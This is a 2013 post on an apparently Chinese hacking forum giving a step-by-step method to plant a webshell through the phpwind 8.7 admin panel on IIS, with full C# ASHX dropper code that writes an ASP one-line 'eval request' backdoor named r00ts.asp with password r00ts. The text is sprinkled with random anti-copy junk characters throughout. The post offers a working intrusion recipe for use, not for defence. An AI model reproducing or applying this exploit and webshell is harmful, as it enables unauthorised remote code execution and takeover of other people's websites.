找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2062|回复: 0
打印 上一主题 下一主题

phpwind 8.7 后台拿shell

[复制链接]
跳转到指定楼层
楼主
发表于 2013-7-26 12:41:46 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
首先点开后台地图 然后附件设置 添加一个ashx后缀 2000大小
$ s0 p. G! ]9 F! I" `8 b
% Z0 H( q. B/ u, J  v群里面我以前扔的那个ashx.txt 下载回来改成fuck.ashx
- Z: O3 k- v' {, i- S# ^
! J* P: Y# B: c0 {2 O发表文章那边有个附件上传 把ashx扔上去 前提是iis 阿帕奇我还真不知道咋整2 |5 \0 C2 f& D

" u' }! O; v1 Z" n/ C. x然后再打开后台地图 附件优化 滑到下面就看到刚上传的ashx
' M/ Y4 A5 l9 [% D
3 V$ O8 x" i/ w+ l: M. F( U打开之后空白 会在目录底下生成r00ts.asp 密码r00ts% t, `5 G8 @- M9 L
8 T9 m: g2 m: w* a
下面是代码:+ j, O/ E/ K1 `! w2 u

, \- @3 e2 r' s7 }7 S9 U5 w* Q% y<%@ WebHandler Language="C#"Class="Handler" %>5 l4 j# C- k) D8 w6 M
using System;
5 x9 u& j% |) N* I6 @using System.Web;# Q& }" h( T4 R( R
using System.IO;
6 i+ @  \- @+ V; q8 m; Epublic class Handler : IHttpHandler {% u+ @4 b* ]1 L# L
public void ProcessRequest (HttpContext context) {: T, o  g, w, g' X9 L' z9 `8 t
context.Response.ContentType = "text/plain";+ Z7 C* l( y/ n
StreamWriter file1= File.CreateText(context.Server.MapPath("r00ts.asp"));, U; ?* W4 c5 k% [+ h
file1.Write("<%eval request(\"r00ts\")%>");
9 B4 A# U4 @% M. M/ `% S: o, ~file1.Flush();2 `2 V. p* H; @
file1.Close();, I3 c" L, J# U, p
}
+ l& g% G4 ~3 h+ Q$ B6 Vpublic bool IsReusable {
- \+ I- `% l# M) ~8 F, n5 H7 ?2 e+ D# [get {
* Q! H" h% D4 t+ _return false;2 I  O" V, t6 E2 z7 J3 C
}
5 q. i# C5 ~1 x3 h- }9 _1 q5 h}! K5 J: ?7 p/ n$ m
}, l7 y$ e: R. |6 _7 }- w) w
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表